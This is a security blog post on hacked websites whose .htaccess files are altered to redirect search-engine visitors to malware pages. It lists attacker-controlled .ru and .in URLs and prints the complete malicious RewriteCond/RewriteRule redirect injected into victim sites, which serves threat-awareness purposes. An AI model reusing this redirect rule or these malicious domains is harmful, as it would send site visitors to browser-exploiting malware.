The New (and Old) .htaccess Attacks – Now Using .in Domains

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:

face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru


There are hundreds of others, however, we are now seeing a shift where most of the domains being used are in the .in TLD. Check out our Global Malware View to see a bit more detail:

http://setting-appic.in/filter/index.php
http://settingappic.in/ecran/index.php
http://appicsetting.in/riba/index.php
http://geografycsturtup.in/apoz/index.php
http://mistyc-faraon.in/mudio/index.php
http://settingappic.in/ecran/index.php (95.163.89.204)
http://loginnewman.in/vooz/index.php
http://pills.ind.in/in.cgi?4 (184.107.238.26)
http://security-tvoya.in/banan/index.php (66.197.168.198)
http://software-mahalai.in/fason/index.php (66.197.168.198)
http://payment-glonas.in/position/index.php
http://masaskisoft.in/ahalai/index.php (66.197.168.199)
http://assistantbilling.in/proccess/index.php (64.120.151.70)
.. and more..

The .htaccess modifications being made by the attacks are a now a little different as well:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|
netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|
yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|
webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|
entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|
teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|
metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|
galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|
fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|
freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|
kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|
bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|
ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|
findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|
kingdomseek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|
uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|
findloo|kobala|limier|express|bestireland|browseireland|iesearch|
ireland-information|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|
chapu|claymont|clickz|clush|ehow|findhow|icq|goo|
westaustraliaonline).(.*)

RewriteRule ^(.*)$ http://settingappic.in/ecran/index.php [R=301,L]

They are listing a lot of major sites/search engines, and redirecting visitors that come in from those sites.

How are sites getting hacked?

Most redirect malware cases we see can be attributed (attack vector) to outdated software(WordPress, Joomla, Timthumb, etc), or your exploited FTP/SFTP (Infected local machines).


Is your site hacked? Scan it here to verify: http://sitecheck.sucuri.net or sign up here to get it cleaned.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pablo

    Great post. Thank you for sharing. I found the Global Malware View very useful also.

  • Heidzir Jamaraji

    Thanks for sharing. Our partner site from Bhutan has been hacked by hacker from Iraq. We help upgrade and hardening their wordpress.

Share This